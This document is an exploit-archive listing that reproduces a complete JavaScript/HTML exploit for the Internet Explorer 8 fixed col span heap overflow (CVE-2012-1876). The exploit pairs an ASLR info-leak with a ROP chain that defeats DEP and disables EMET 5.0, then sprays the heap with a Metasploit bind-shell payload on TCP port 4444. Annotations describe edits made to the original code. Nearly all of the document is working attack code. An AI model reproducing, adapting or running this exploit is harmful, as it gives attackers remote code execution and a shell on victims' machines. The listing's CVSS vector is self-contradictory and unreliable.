





Internet Explorer 8 Fixed Col Span ID Full ASLR, DEP, And EMET 5.0 Bypass

CVE Category Price Severity
CVE-2012-1876 CWE-Other N/A High
Author Risk Exploitation Type Date
sickness (exploit) / ryujin (EMET 5.0 bypass) — per the listing's own header Critical Remote 2014-10-01
CPE
cpe:cpe:/a:microsoft:internet_explorer:8
CVSS EPSS EPSSP
CVSS:4.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description: the vector above looks auto-generated and should not be taken at face value — AV:P (physical access) contradicts the remote, browser-delivered exploitation this listing records, and S:U is a v3.x metric that does not exist in CVSS 4.0. Re-score before relying on it.

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2014090157

Below is a copy:

<!--
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass
** Exploit Coded by sickness || EMET 5.0 bypass by ryujin
** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ 
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID (heap overflow: enlarging a <col>'s span after a table-layout:fixed table has been laid out; this script triggers it twice, first with a harmless width to read past a groomed string and leak a module pointer, then with a large width to overwrite the neighbouring object)
** CVE: CVE-2012-1876
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0
-->
 
<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
<script language='javascript'>
 
function strtoint(str) {
    // Reinterpret the first two UTF-16 units of `str` as one little-endian
    // 32-bit value: unit 0 is the low word, unit 1 the high word.  Used on
    // leaked heap bytes, so the result may exceed 2^31 and is kept as a plain
    // (unsigned) Number rather than assembled with bit shifts.
    var lo = str.charCodeAt(0);
    var hi = str.charCodeAt(1);
    return lo + hi * 65536;
}
 
// Heap grooming.  Three 500-character filler strings; each loop iteration
// below takes a 125-unit prefix of each, which (2 bytes/unit plus the 4-byte
// length prefix and 2-byte terminator of an IE BSTR) presumably yields
// 0x100-byte heap chunks -- hence "(0x100-6)/2".
var free = "EEEE";
while ( free.length < 500 ) free += free;
 
var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;
 
var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;
 
// fr: slots freed later to punch holes; al/bl: kept alive as neighbours.
// Only even indices are filled (i += 2); bl[498] is the last one and is the
// string get_leak() reads the leaked pointer out of.
var fr = new Array();
var al = new Array();
var bl = new Array();
 
// Hidden container so the buttons created below never render.
var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";
 
for (var i=0; i < 500; i+=2) {
        fr[i] = free.substring(0, (0x100-6)/2);
        al[i] = string1.substring(0, (0x100-6)/2);
        bl[i] = string2.substring(0, (0x100-6)/2);
        // A <button> per iteration interleaves its layout object with the
        // strings; heapspray()'s parameter name suggests that object (a
        // CButtonLayout) is what the leak points into -- inferred, not visible here.
        var obj = document.createElement("button");
        div_container.appendChild(obj);
}
 
// Free the upper 150 "E" strings, collecting after each, to leave 0x100-byte
// holes among the still-live al/bl strings for the overflowed column array to
// land in (presumed).  The allocation order above is the whole point of this
// block; do not reorder it.
for (var i=200; i<500; i+=2 ) {
        fr[i] = null;
        CollectGarbage();
}
 
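function heapspray(cbuttonlayout) {
    // Build the ROP chain, the EMET-disabling stub and the payload, then spray
    // 100 one-megabyte copies so the hard-coded 0x076dxxxx pointers used below
    // land in attacker-controlled memory.  `cbuttonlayout` is the module base
    // computed by get_leak(); every gadget() offset is relative to it and is
    // specific to the build named in the header (IE 8.0.7601.17514, Windows 7
    // x86, EMET 5.0).  Returns the spray array so a caller may keep it alive;
    // the existing caller discards it, which is the original behaviour.
    // Fixes versus the original listing: addresses are zero-padded to 8 hex
    // digits (the substring(4,8)/substring(0,4) split emitted garbage for any
    // address below 0x10000000), loop indices no longer leak into globals, the
    // "POP EBP" comment on what is really POP EBX is corrected, and three
    // gadgets that were computed but never placed in the chain are dropped.
    if (typeof CollectGarbage === "function") CollectGarbage(); // IE-only

    // One 32-bit little-endian stack slot, encoded as the two UTF-16 units
    // unescape() produces from "%uLLLL%uHHHH" (low word first).
    function dword(addr) {
        var hex = ("00000000" + addr.toString(16)).slice(-8);
        return unescape("%u" + hex.substring(4, 8) + "%u" + hex.substring(0, 4));
    }
    // Gadget or import-table slot at a fixed offset from the leaked base.
    function gadget(off) {
        return dword(cbuttonlayout + off);
    }

    // Gadgets; names give the instruction sequence, each ends in RETN.
    var ret = gadget(4161);
    var popEbp = gadget(11360);
    var xchgEaxEsp = gadget(111675);        // stack pivot into the spray
    var popEbx = gadget(12377);
    var popEdx = gadget(642768);
    var popEcx = gadget(12201);
    var writable = gadget(5504544);         // scratch dword (lpflOldProtect in the mona layout)
    var popEdi = gadget(12462);
    var popEsi = gadget(12043);
    var jmpEax = gadget(63776);
    var popEax = gadget(85751);
    var virtualProtectIat = gadget(4936);   // import slot holding VirtualProtect
    var movEaxPtrEax = gadget(454843);      // MOV EAX,DWORD PTR DS:[EAX]
    var pushad = gadget(234657);
    var pushEsp = gadget(408958);
    var popEcx2 = gadget(2228408);          // second POP ECX
    var popEax2 = gadget(1586172);          // second POP EAX
    var movEaxPtrEax2 = gadget(1589179);    // second MOV EAX,DWORD PTR [EAX]
    var pushEax = gadget(1884912);          // PUSH EAX # RETN: "calls" the address in EAX
    var addEaxEcx = gadget(2140694);
    var movPtrEaxEcx = gadget(2364867);     // MOV DWORD PTR [EAX],ECX
    var movPtrEsiEax = gadget(1816868);     // MOV DWORD PTR DS:[ESI],EAX
    var getModuleHandleWIat = gadget(4840); // import slot holding GetModuleHandleW
    // The original also computed ADD ESP,0C (+5036248), MOV EDX,EAX # MOV
    // EAX,EDX # POP ESI (+3660458) and PUSH EDX # CALL EAX (+1560432) but never
    // used them in the chain.

    // Absolute addresses inside the spray; valid only if the spray lands where
    // the author observed it and every copy keeps the 1000-unit period below.
    var emetNameStr = unescape("%u10c4%u076d");   // 0x076d10c4: the L"EMET" string stored after the chain
    var emetBaseSlot = unescape("%u10c0%u076d");  // 0x076d10c0: where EMET's base is saved
    var decodeArgSlot = unescape("%u104c%u076d"); // 0x076d104c: the DecodePointer argument slot in this very chain (presumably the %u9090%u9090 placeholder below), patched at run time
    var configPtrSlot = unescape("%u10bc%u076d"); // 0x076d10bc: where the decoded config pointer is saved; also read by the stage-2 stub

    // Padding consumed before execution reaches the first RETN (sized for this build).
    var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343");
    shellcode += unescape("%u4141%u4141%u4242%u4242%u4343%u4343");
    shellcode += unescape("%u4141%u4141");

    shellcode += ret;
    shellcode += popEbp;
    shellcode += xchgEaxEsp;   // ESP now walks this chain

    // --- EMET disable, stage 1: find EMET's module, decode its config pointer
    //     and clear the ROP-protection field in it (offsets from the blog post
    //     cited in the header).  PUSH EAX # RETN is used as a call: the pushed
    //     address is "returned" into, the next chain slot is the return address
    //     and the slot after that is the stdcall argument.
    shellcode += popEax2;
    shellcode += getModuleHandleWIat;
    shellcode += movEaxPtrEax2;            // EAX = &GetModuleHandleW
    shellcode += pushEax;                  // GetModuleHandleW(L"EMET"), returns into popEcx2
    shellcode += popEcx2;
    shellcode += emetNameStr;              // argument, popped by the callee's ret 4
    shellcode += unescape("%ua84c%u000a"); // ECX = 0x000aa84c: offset of the encoded config pointer
    shellcode += popEsi;
    shellcode += emetBaseSlot;
    shellcode += movPtrEsiEax;             // save EMET base
    shellcode += addEaxEcx;                // EAX = base + 0xaa84c
    shellcode += movEaxPtrEax;             // EAX = encoded config pointer
    shellcode += popEsi;
    shellcode += decodeArgSlot;
    shellcode += movPtrEsiEax;             // patch it into the DecodePointer argument slot below
    shellcode += popEax2;
    shellcode += emetBaseSlot;
    shellcode += movEaxPtrEax;             // EAX = EMET base again
    shellcode += popEcx2;
    shellcode += unescape("%u80b0%u0004"); // ECX = 0x000480b0: EMET's import slot for DecodePointer
    shellcode += addEaxEcx;
    shellcode += movEaxPtrEax;             // EAX = &DecodePointer
    shellcode += pushEax;                  // DecodePointer(patched arg), returns into popEsi
    shellcode += popEsi;
    shellcode += unescape("%u9090%u9090"); // DecodePointer argument placeholder (patched above)
    shellcode += configPtrSlot;
    shellcode += movPtrEsiEax;             // save decoded config pointer
    shellcode += popEcx2;
    shellcode += unescape("%u0558%u0000"); // ECX = 0x558: ROP-protection field
    shellcode += addEaxEcx;
    shellcode += popEcx2;
    shellcode += unescape("%u0000%u0000");
    shellcode += movPtrEaxEcx;             // config[0x558] = 0
    // --- stage 1 end

    // --- VirtualProtect, mona.py-style PUSHAD chain.  Registers are loaded so
    //     that PUSHAD lays out the call frame: EDI = RET (rop nop), ESI = JMP
    //     EAX, EBP = return address, EBX = size, EDX = 0x40 (RWX), ECX =
    //     scratch dword, EAX = VirtualProtect.  PUSH ESP # RETN then jumps to
    //     the bytes immediately following the chain.
    shellcode += popEbp;
    shellcode += popEbp;                   // EBP = address of POP EBP # RETN
    shellcode += popEbx;                   // POP EBX (the original comment said EBP)
    shellcode += unescape("%u1024%u0000"); // dwSize = 0x1024
    shellcode += popEdx;
    shellcode += unescape("%u0040%u0000"); // flNewProtect = PAGE_EXECUTE_READWRITE
    shellcode += popEcx;
    shellcode += writable;                 // lpflOldProtect
    shellcode += popEdi;
    shellcode += ret;
    shellcode += popEsi;
    shellcode += jmpEax;
    shellcode += popEax;
    shellcode += virtualProtectIat;
    shellcode += movEaxPtrEax;             // EAX = &VirtualProtect
    shellcode += pushad;
    shellcode += pushEsp;

    // Storage the chain above writes into / reads from.  "90 90 eb 14" is two
    // NOPs and a short jump over the next 20 bytes of storage.
    shellcode += unescape("%u9090%u9090");
    shellcode += unescape("%u9090%u14eb");
    shellcode += unescape("%u4242%u4242"); // decoded config pointer lands here
    shellcode += unescape("%u4141%u4141"); // EMET base lands here
    shellcode += "EMET";                   // L"EMET" for GetModuleHandleW ...
    shellcode += unescape("%u0000%u0000"); // ... plus its terminator
    shellcode += unescape("%u9090%u9090");
    shellcode += unescape("%u9090%u9090");

    // --- EMET disable, stage 2 (native code, runs after VirtualProtect):
    //     takes the saved config pointer, loads the function pointer at
    //     config+0x518, builds a zeroed 0x2cc-byte struct on the stack whose
    //     first dword is 0x10010, and calls it with (0xFFFFFFFE, &struct).
    // MOV     EAX,DWORD PTR DS:[076D10BCH]
    // MOV     ESI,DWORD PTR [EAX+518H]
    // SUB     ESP,2CCH
    // MOV     DWORD PTR [ESP],10010H
    // MOV     EDI,ESP
    // MOV     ECX,2CCH
    // ADD     EDI,4
    // SUB     ECX,4
    // XOR     EAX,EAX
    // REP STOS BYTE PTR ES:[EDI]
    // PUSH    ESP
    // PUSH    0FFFFFFFEH
    // CALL    ESI
    shellcode += unescape("%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec" +
                          "%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +
                          "%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +
                          "%ufe6a%ud6ff");
    shellcode += unescape("%u9090%u9090");
    shellcode += unescape("%u9090%u9090");
    // --- stage 2 end

    // Payload: bind shell on TCP/4444.
    // msf > generate -t js_le
    // windows/shell_bind_tcp - 342 bytes
    // http://www.metasploit.com
    // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
    // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
    // Keep any replacement payload the same size: the 0x076dxxxx pointers
    // above assume the 1000-unit period enforced below, and a payload longer
    // than what fits leaves no padding at all (substr with a negative length
    // is empty), breaking that period.
    shellcode += unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
                          "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
                          "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
                          "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
                          "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
                          "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
                          "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
                          "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
                          "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
                          "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
                          "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
                          "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
                          "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
                          "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
                          "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
                          "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
                          "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
                          "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
                          "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
                          "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
                          "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
                          "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
                          "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
                          "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
                          "%u006a%uff53%u41d5");

    // Pad one copy of chain + payload to exactly 1000 UTF-16 units so the
    // spray has a fixed period, then grow it by doubling.
    var nops = unescape("%u9090");
    while (nops.length < 1000) {
        nops += nops;
    }
    shellcode += nops.substr(0, 1000 - shellcode.length);
    while (shellcode.length < 100000) {
        shellcode += shellcode;
    }

    // 16 slices of 32 K units, the last one 19 units short (38 bytes shaved
    // off, presumably for the string header so each copy stays a 1 MB block).
    var sliceLen = 64 * 1024 / 2;
    var onemeg = shellcode.substr(0, sliceLen);
    for (var k = 0; k < 14; k++) {
        onemeg += shellcode.substr(0, sliceLen);
    }
    onemeg += shellcode.substr(0, sliceLen - (38 / 2));

    // substr() of the whole string forces a fresh allocation per copy instead
    // of 100 references to one buffer.
    var spray = [];
    for (var j = 0; j < 100; j++) {
        spray[j] = onemeg.substr(0, onemeg.length);
    }
    return spray;
}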
 
function leak(){
        // Step 1: trigger the overflow with a harmless width.  Raising the span
        // from 9 (the markup) to 19 makes the fixed-layout column array outgrow
        // its chunk; judging by get_leak() reading past bl[498]'s own 125 units
        // afterwards, the spill-over presumably corrupts a groomed string's
        // length so adjacent heap memory becomes readable from script.
        var leak_col = document.getElementById("132");
        leak_col.width = "41";
        leak_col.span = "19";
}
 
function get_leak() {
    // Pull the leaked dword out of bl[498]: two UTF-16 units at offset 136,
    // i.e. past the string's own 125 units (readable only because leak() has
    // already corrupted the heap next to it).  Subtracting 1410704 (0x158690)
    // turns it -- presumably a CButtonLayout vtable pointer, going by the name
    // heapspray() gives its parameter -- into the module base every gadget is
    // rebased on, for the build named in the header.  The original's unused
    // hex/alert debug line is dropped.
    var strLen = (0x100 - 6) / 2;
    var leaked = strtoint(bl[498].substring(strLen + 11, strLen + 13));
    var moduleBase = leaked - 1410704;
    setTimeout(function () { heapspray(moduleBase); }, 50);
}
 
function trigger_overflow(){
        // Step 2: the same <col> again, now with a huge width and span 44, so the
        // enlarged column array overflows with attacker-chosen width values.
        // What it corrupts is not visible in this script; the hard-coded
        // 0x076dxxxx addresses in heapspray() are where control is meant to
        // land, so this must run only after the spray (hence the 700 ms delay).
        var evil_col = document.getElementById("132");
        evil_col.width = "1245880";
        evil_col.span = "44";
}
 
// Timeline (grooming already ran at load): overflow once to leak (400 ms),
// read the leak and schedule the spray (450 ms; heapspray() itself runs 50 ms
// later), overflow again to take control (700 ms).  The delays are what the
// author found reliable, presumably to let layout and GC settle between steps.
setTimeout(leak, 400);
setTimeout(get_leak, 450);
setTimeout(trigger_overflow, 700);
 
</script>
</body>
</html>


